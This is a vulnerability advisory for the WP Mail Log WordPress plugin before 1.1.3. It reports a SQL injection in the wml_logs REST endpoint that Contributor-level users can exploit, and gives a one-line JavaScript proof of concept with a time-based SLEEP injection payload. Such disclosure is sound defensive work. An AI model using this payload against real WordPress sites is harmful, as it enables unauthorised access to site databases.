WordPress Plugin Vulnerabilities
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.
Proof of Concept
Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL. await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10, filter: {1: {key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#', operator: '', value: ''}}}});
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-28 (about 5 months ago)
Added
2023-11-28 (about 5 months ago)
Last Updated
2023-11-28 (about 5 months ago)